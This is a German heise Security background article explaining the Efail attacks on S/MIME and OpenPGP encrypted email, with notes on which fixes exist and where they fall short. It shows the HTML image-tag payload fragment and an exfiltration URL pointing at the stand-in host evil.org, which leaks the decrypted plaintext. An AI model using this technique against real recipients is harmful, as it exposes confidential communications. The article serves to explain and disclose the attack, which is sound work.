heise online Logo
Anmelden
Menü
  • c't – Magazin für Computertechnik
  • iX – Magazin für professionelle Informationstechnik
  • MIT Technology Review – Das Magazin für Innovation von Heise
  • c't Fotografie - Das Magazin rund ums digitale Bild
  • Mac & i – Nachrichten, Tests, Tipps und Meinungen rund um Apple
  • Make – Kreativ mit Technik
  • Alle Magazine im Browser lesen
IT News
  • Newsticker
  • heise Developer
  • heise Netze
  • heise Open Source
  • heise Security
Online-Magazine
  • heise+
  • Telepolis
  • heise Autos
  • TechStage
  • tipps+tricks
Services
  • Stellenmarkt heise Jobs
  • Weiterbildung
  • heise Download
  • Preisvergleich
  • Whitepaper/Webcasts
  • DSL-Vergleich
  • Netzwerk-Tools
  • Spielen bei Heise
  • Loseblattwerke
  • iMonitor
  • IT-Markt
Heise Medien
  • heise Shop
  • Abo
  • Veranstaltungen
  • Arbeiten bei Heise
  • Mediadaten
  • Presse
Anzeige Online-Marketing
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten
heise Security Logo
  • News
    • Archiv
    • 7-Tage-News
  • Hintergrund
  • heise Security Pro
    • FAQs zu heise Security Pro
  • Events
  • Kontakt
  1. Security
  2. Hintergrund
  3. PGP und S/MIME: So funktioniert Efail

PGP und S/MIME: So funktioniert Efail

Hintergrund 14.05.2018 16:21 Uhr Jürgen Schmidt
PGP und S/MIME: So funktioniert #efail

Die Angriffe auf verschlüsselte E-Mails mit S/MIME und OpenPGP lassen sich eigentlich ganz einfach erklären. Wenn man sie einmal verstanden hat, weiß man auch, warum das mit dem Fixen nicht ganz so einfach ist.

Ein Forscherteam rund um Sebastian Schinzel hat erfolgreiche Angriffe gegen verschlüsselt verschickte E-Mails demonstriert. Dabei gelangt der Angreifer in den Besitz zumindest eines Teils des Klartexts der Mails. Betroffen sind die beiden am weitesten verbreiteten Standards für E-Mail-Verschlüsselung S/MIME und OpenPGP – und in der ein oder anderen Form nahezu alle E-Mail-Programme. Die wichtigste Voraussetzung für einen erfolgreichen Angriff ist, dass der Angreifer die verschlüsselte Mail unterwegs abfangen und manipulieren kann. Das dürfte in vielen Fällen zutreffen, in denen die Ende-zu-Ende-Verschlüsselung von PGP oder S/MIME eigentlich Schutz bieten soll.

Das grundsätzliche Problem der E-Mail-Verschlüsselung ist die Tatsache, dass die E-Mails nicht oder zumindest nicht ausreichend gegen solche Manipulationen gesichert sind. So kann der Angreifer die Mail derart verändern, dass der Mail-Client beim Anzeigen der entschlüsselten Mail die eigentlich geheimen Informationen an Dritte weitergibt. Der Angreifer knackt also nicht die Verschlüsselung und er gelangt auch nicht in den Besitz geheimer Schlüssel.

Das in einer PGP-Mail verschickte, geheime Passwort landet auf unserem improvisierten Server.
Das in einer PGP-Mail verschickte, geheime Passwort landet auf unserem improvisierten Server.

Ein simpler Angriff

Efail und die mangelhafte Integritätssicherung treffen sowohl S/MIME als auch PGP an einem wunden Punkt – allerdings in unterschiedlichem Ausmaß. Am einfachsten lässt sich das Problem mit S/MIME illustrieren.

Eine S/MIME-Mail enthält den verschlüsselten Text als MIME-Anhang. Der Angreifer fängt diese MIME-Mail ab und fügt jeweils einen eigenen MIME-Anhang davor und dahinter ein, bevor er sie an den Empfänger weiter leitet. Der erste eingefügte Teil hat etwa den folgenden Inhalt:

<img src='http://evil.org/?

Man beachte das geöffnete aber nicht geschlossene Anführungszeichen, dessen Gegenpart der hintere Anhang liefert:

'>

Beim Anzeigen der Mail passiert das Folgende: Der E-Mail-Client entschlüsselt den S/MIME-Teil – etwa zu "STRENG_GEHEIMER_TEXT" – und setzt aus allen drei Teilen ein HTML-Dokument zusammen. Um das anzuzeigen ruft er die URL

http://evil.org/?STRENG_GEHEIMER_TEXT

auf. Damit landet der geheime Klartext beim Angreifer. Dieses Angriffsszenario ließ sich übrigens eins zu eins auf OpenPGP übertragen. In einem einfachen Test unter Laborbedingungen mit Enigmail Version 1.9.7 kam der exfiltrierte Klartext der geheimen Mail tatsächlich auf unserem Test-Server an. Für diesen Test haben wir das Nachladen von Bildern explizit gestattet. Die auf Ubuntu aktuelle Version Enigmail 1.9.9 zeigte bei diesem einfachen Angriff nur eine Fehlermeldung an.

Exfiltration Gadgets

Die Entwickler bessern nach: Mit Enigmail 1.9.9 scheiterte zumindest dieser simple Angriff.
Die Entwickler bessern nach: Mit Enigmail 1.9.9 scheiterte zumindest dieser simple Angriff.

Es gibt zwei Ansätze, dieses Problem zu entschärfen: Man schaltet das Nachladen von Bildern ab und die Entwickler sorgen für eine strikte Trennung der E-Mail-Anhänge, damit sich deren Inhalte nicht gegenseitig beeinflussen. Beide Ansätze doktorn nur an Symptomen herum, ohne das grundsätzliche Problem zu fixen. So zeigen Schinzel et al. bereits in ihrem Paper zu Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels (PDF) ausgefeiltere Angriffstechniken.

Neben dem einfachen Nachladen von Bildern stellen sie eine Reihe von anderen Kanälen vor, über die ein eingeschleuster Nachrichtenteil geheime Informationen verraten könnte. Die Forscher sprechen von "Exfiltration Gadgets", die sie in die Mails einschleusen. Das komplette Abschalten von HTML dürfte allerdings die meisten davon still schalten. Doch die Hand ins Feuer legen, dass da nicht doch noch was geht, möchte ich zumindest nicht.

Efail - Lücken in der E-Mail-Verschlüsselung

Weder S/MIME noch OpenPGP können die Sicherheit von verschlüsselt verschickten Nachrichten ausreichend garantieren, wie Forscher entdeckt haben. Nahezu alle Programme sind von dem Problem betroffen.

  • PGP und S/MIME: E-Mail-Verschlüsselung akut angreifbar
  • So funktioniert Efail
  •  Efail: Welche E-Mail-Clients sind wie sicher?

Auch auf eine strikte Separation der einzelnen Nachrichtenteile haben die Forscher eine Antwort parat: Sie demonstrieren, dass sie ihre Exfiltration Gadgets auch in den Cipher-Text einschleusen können. Das erfordert deutlich mehr Aufwand und dabei geht auch ein Teil der Nachricht kaputt. Doch Schinzel et al konnten demonstrieren, dass sie mit ihren eingeschleusten Gadgets trotzdem Teile der Nachricht exfiltieren können.

Das liegt daran, dass die zur Verschlüsselung eingesetzte Blockchiffre nicht ausreichend gegen Manipulation gesichert ist. Es ist bereits lange bekannt, dass AES sowohl im Cipher Block Chaining Modus (CBC, S/MIME) als auch im Cipher Feedback Mode (CFB) von OpenPGP dafür anfällig sind. So gelang es den Forschern sowohl bei S/MIME als auch – mit etwas mehr Aufwand – bei OpenPGP-Nachrichten Exfiltration Gadgets in den Ciphertext zu schmuggeln. Weitere Details dazu erläutert das Efail-Paper.

Schwachpunkt Integrität

Was man eigentlich haben möchte, ist ein expliziter Schutz verschlüsselter Nachrichten gegen nachträgliche Manipulation. Und da kommen wir zum positiven Teil: Während S/MIME in dieser Hinsicht völlig blank ist, hat OpenPGP das im Prinzip bereits: Der Modification Detection Code (MDC) soll vor genau solchen Angriffen durch Manipulationen schützen.

Das Problem dabei: Längst nicht alle OpenPGP-Implementierungen nutzen die. Und selbst wenn MDCs zum Einsatz kommen, kann sie ein Angreifer beim derzeitigen Stand der Dinge relativ leicht umgehen. Im einfachsten Fall entfernt er die MDCs und der Angriff funktioniert wie zuvor. Oder er lebt mit einem kaputten MDC. Der Anwender erhält dann zwar eine Warnung, aber in vielen Fällen versucht der Mail-Client trotzdem, die Nachricht darzustellen und exfiltriert dabei Geheimtext.

Keine einfachen Fixes

In wie weit sich Efail richtig fixen lässt, hängt also maßgeblich davon ab, ob es gelingt, verschlüsselte E-Mails ausreichend gegen Manipulationen zu sichern. Für S/MIME gibt es dazu bislang nicht einmal Ansätze. Das bedeutet, dass man damit rechnen sollte, dass schnelle Fixes das Problem nicht wirklich lösen werden.

Bei OpenPGP ist die Situation nicht ganz so hoffnungslos. Zum einen gibt es bereits Versionen etwa von Enigmail, die die aktuellen Efail-Angriffe unmöglich machen. Zum Anderen kann man hoffen, dass die Entwickler jetzt mit Hochdruck daran arbeiten, die Integritätssicherung zu verbessern. GnuPG-Autor Werner Koch hat dazu bereits moderne Konzepte für Authenticated Encryption in Aussicht gestellt. (ju)

Kommentare lesen (548 Beiträge)

Mehr zum Thema

  • E-Mail
  • efail
  • Enigmail
  • OpenPGP
  • Verschlüsselung

Forum bei heise online: Verschlüsselung

Teile diesen Beitrag

https://heise.de/-4048873 Drucken
Dienste
  • Security Consulter
  • Netzwerkcheck
  • Anti-Virus
  • Emailcheck
  • Krypto-Kampagne
Alerts! alle Alert-Meldungen

Trend Micro ServerProtect

Chrome, Edge

Zero Day in iOS und macOS

Mac & i

Cisco

Anzeige
  • Ivacy VPN: 90 Prozent Rabatt und weltweiter Zugriff auf Netflix & Co.
  • Dark Web – Einblick in die Kehrseite des Internets
  • Bessere Datenanalysen mit Machine Learning
  • Wie muss ein Hybrid-Work-Arbeitsplatz aussehen?
  • Mit Endpoint Management Cyberattacken abwehren!
  • Bundeswehr erkundet virtuellen Raum
  • So holen Sie mehr aus Microsoft Outlook heraus
  • Professionelle Videobearbeitung
  • Mehr Chancen durch Remote Work – und Gefahren?
  • Die Zukunft der Mobilität mitgestalten
Artikel

Digitalisierung in Deutschland: Wahlleitung im E-Mail-Test

Anlässlich der anstehenden Bundestagswahl testeten wir die Mail-Server der Wahlbehörden. Viele davon genügten Basisanforderungen an die Sicherheit nicht.

102 Kommentare

Das Conti-Leak: Bedienungsanleitung für Ransomware​

In den Handbüchern für Affiliates beschreiben die Kriminellen minutiös, wie man ein Netz auskundschaftet, Zugang ausweitet und schließlich Daten verschlüsselt.

140 Kommentare
MVT Logo

iPhones selbst auf Pegasus und andere Spyware prüfen

Das Mobile Verification Toolkit (MVT) von Amnesty International untersucht Android und iOS-Geräte nach Spuren von Spyware, wie sie Pegasus von NSO hinterlässt.

89 Kommentare

Neueste Forenbeiträge

  1. DVD 21/22 bootet nicht
    Habe sie gestern im Laden gekauft, DVD nicht lesbar. Weder unter Windows noch unter Linux Ubu 20.04.2 ("kein Medium") Was tun?

    Forum:  Desinfect

    Avatar von shandar
    von shandar; vor 48 Minuten
  2. Re: Das Depot »https://www.heise.de..." enthält keine Release Datei
    Hallo, werden die Versionen nicht nur 1 Jahr bzw. bis zum nächsten Desinfec't Release unterstützt? Es gibt eine neue Ausgabe dieses…

    Forum:  Desinfect

    maal1 hat keinen Avatar
    von maal1; vor 4 Stunden
  3. mit desinfect 2021 erzeugter USB bootet nicht
    Ich habe die Ausgabe mit der DVD und nach dem Update einen USB Stick mit der Funktion "Desinfec't -Stick bauen" erzeugt. Das hat auch mit einer…

    Forum:  Desinfect

    htwdst hat keinen Avatar
    von htwdst; Sonntag, 12:10
News und Artikel
  • News
  • 7-Tage-News
  • News-Archiv
  • Hintergrund-Artikel
  • Alert-Meldungen
Service
  • Newsletter
  • Tools
  • Foren
  • RSS
  • mobil
Dienste
  • Security Consulter
  • Netzwerkcheck
  • Anti-Virus
  • Emailcheck
  • Krypto-Kampagne
  • Datenschutz
  • Cookies & Tracking
  • Impressum
  • Kontakt
  • 2425547
  • Content Management by InterRed
  • Hosted by Plus.line
  • Copyright © 2021 Heise Medien